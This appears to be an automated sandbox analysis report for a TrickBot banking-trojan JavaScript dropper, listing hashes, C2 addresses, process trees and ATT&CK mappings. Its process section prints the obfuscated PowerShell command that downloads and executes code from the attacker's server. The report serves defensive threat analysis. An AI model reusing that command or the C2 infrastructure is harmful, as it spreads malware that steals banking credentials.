trickbot | 185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884

General

Target

4524.js
Size

344KB
MD5

1e15caad81dbf43c24c3517c6658c138
SHA1

5a0e8e9cdc2a8b5a575c8f55674fa675ff49eef2
SHA256

185ac740c3516c3a6461b15d9b94047d6b48c0bd2184a03087890b573ace2884
SHA512

dd094e3e20987d6951da8e7069bff408b09293a6c67077a77d6721b801754a2cf4bee895b67bac4a65d0a0f49a57be180b059f4334d9ecd825497c6d07da00fd

Score

10^/10

trickbot rob109 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://109.248.201.26/lovemetertok.php

Extracted

Family

trickbot

Version

100018

Botnet

rob109

C2

38.110.103.124:443

185.56.76.28:443

204.138.26.60:443

60.51.47.65:443

74.85.157.139:443

68.69.26.182:443

38.110.103.136:443

38.110.103.18:443

138.34.28.219:443

185.56.76.94:443

217.115.240.248:443

24.162.214.166:443

80.15.2.105:443

154.58.23.192:443

38.110.100.104:443

45.36.99.184:443

185.56.76.108:443

185.56.76.72:443

138.34.28.35:443

97.83.40.67:443

Attributes

autorun
Name:pwgrabb
Name:pwgrabc

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

12 3188 powershell.exe
13 3188 powershell.exe
Downloads MZ/PE file
Loads dropped DLL 1 IoCs

Processes:

rundll32.exe

pid process

1560 rundll32.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

20 ipinfo.io
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3188 powershell.exe
3188 powershell.exe
3188 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exewermgr.exe

description pid process

Token: SeDebugPrivilege 3188 powershell.exe
Token: SeDebugPrivilege 1988 wermgr.exe

flow	pid	process
12	3188	powershell.exe
13	3188	powershell.exe

pid	process
1560	rundll32.exe

flow	ioc
20	ipinfo.io

pid	process
3188	powershell.exe
3188	powershell.exe
3188	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	1988	wermgr.exe

Suspicious use of WriteProcessMemory 16 IoCs

Processes:

wscript.execmd.exepowershell.exerundll32.exerundll32.exe

description	pid	process	target process
PID 4796 wrote to memory of 4216	4796	wscript.exe	cmd.exe
PID 4796 wrote to memory of 4216	4796	wscript.exe	cmd.exe
PID 4216 wrote to memory of 3188	4216	cmd.exe	powershell.exe
PID 4216 wrote to memory of 3188	4216	cmd.exe	powershell.exe
PID 3188 wrote to memory of 1396	3188	powershell.exe	rundll32.exe
PID 3188 wrote to memory of 1396	3188	powershell.exe	rundll32.exe
PID 1396 wrote to memory of 1560	1396	rundll32.exe	rundll32.exe
PID 1396 wrote to memory of 1560	1396	rundll32.exe	rundll32.exe
PID 1396 wrote to memory of 1560	1396	rundll32.exe	rundll32.exe
PID 1560 wrote to memory of 1832	1560	rundll32.exe	cmd.exe
PID 1560 wrote to memory of 1832	1560	rundll32.exe	cmd.exe
PID 1560 wrote to memory of 1832	1560	rundll32.exe	cmd.exe
PID 1560 wrote to memory of 1988	1560	rundll32.exe	wermgr.exe
PID 1560 wrote to memory of 1988	1560	rundll32.exe	wermgr.exe
PID 1560 wrote to memory of 1988	1560	rundll32.exe	wermgr.exe
PID 1560 wrote to memory of 1988	1560	rundll32.exe	wermgr.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\4524.js
1⤵
- Suspicious use of WriteProcessMemory
PID:4796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
2⤵
- Suspicious use of WriteProcessMemory
PID:4216

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQAwADkALgAyADQAOAAuADIAMAAxAC4AMgA2AC8AbABvAHYAZQBtAGUAdABlAHIAdABvAGsALgBwAGgAcAAiACkA
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3188

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\PikEKhmf.bin,StartW
4⤵
- Suspicious use of WriteProcessMemory
PID:1396

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\PikEKhmf.bin,StartW
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe
6⤵
PID:1832

C:\Windows\system32\wermgr.exe
C:\Windows\system32\wermgr.exe
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\PikEKhmf.bin
MD5
e83da411f4e24b83cae6fb96091a3a6a

SHA1
1ca0f1a1a123f4e7afa38e4ed262ca189166940d

SHA256
b7e491fa74358e49d9e2db79d7d3dbb2c0c59dce30ba65b91f147a4bf6ec25a2

SHA512
cdfb967dc03fca87d788fbc48df61ed1dae914ed93f1652c432c4b6c3c0088397dfac3bacef49ade0e70ba6bfbe1d57d40ad526a3742c0d9e382e631d65e9990

Download Submit
\Users\Admin\AppData\Local\Temp\PikEKhmf.bin
MD5
e83da411f4e24b83cae6fb96091a3a6a

SHA1
1ca0f1a1a123f4e7afa38e4ed262ca189166940d

SHA256
b7e491fa74358e49d9e2db79d7d3dbb2c0c59dce30ba65b91f147a4bf6ec25a2

SHA512
cdfb967dc03fca87d788fbc48df61ed1dae914ed93f1652c432c4b6c3c0088397dfac3bacef49ade0e70ba6bfbe1d57d40ad526a3742c0d9e382e631d65e9990

Download Submit
memory/1396-136-0x0000000000000000-mapping.dmp

Download
memory/1560-148-0x0000000004870000-0x00000000048A8000-memory.dmp

Filesize
224KB

Download
memory/1560-150-0x0000000004950000-0x0000000004951000-memory.dmp

Filesize
4KB

Download
memory/1560-151-0x0000000004791000-0x0000000004793000-memory.dmp

Filesize
8KB

Download
memory/1560-149-0x00000000049C0000-0x0000000004A04000-memory.dmp

Filesize
272KB

Download
memory/1560-146-0x0000000004980000-0x00000000049B7000-memory.dmp

Filesize
220KB

Download
memory/1560-144-0x00000000048F0000-0x0000000004929000-memory.dmp

Filesize
228KB

Download
memory/1560-139-0x0000000000000000-mapping.dmp

Download
memory/1560-141-0x00000000048B0000-0x00000000048EB000-memory.dmp

Filesize
236KB

Download
memory/1988-152-0x0000000000000000-mapping.dmp

Download
memory/1988-154-0x0000017C57680000-0x0000017C57681000-memory.dmp

Filesize
4KB

Download
memory/1988-153-0x0000017C57640000-0x0000017C57668000-memory.dmp

Filesize
160KB

Download
memory/3188-115-0x0000000000000000-mapping.dmp

Download
memory/3188-121-0x00000195FAA70000-0x00000195FAA71000-memory.dmp

Filesize
4KB

Download
memory/3188-128-0x00000195FE9C0000-0x00000195FE9C1000-memory.dmp

Filesize
4KB

Download
memory/3188-135-0x00000195FC866000-0x00000195FC868000-memory.dmp

Filesize
8KB

Download
memory/3188-134-0x00000195FC863000-0x00000195FC865000-memory.dmp

Filesize
8KB

Download
memory/3188-133-0x00000195FC860000-0x00000195FC862000-memory.dmp

Filesize
8KB

Download
memory/4216-114-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads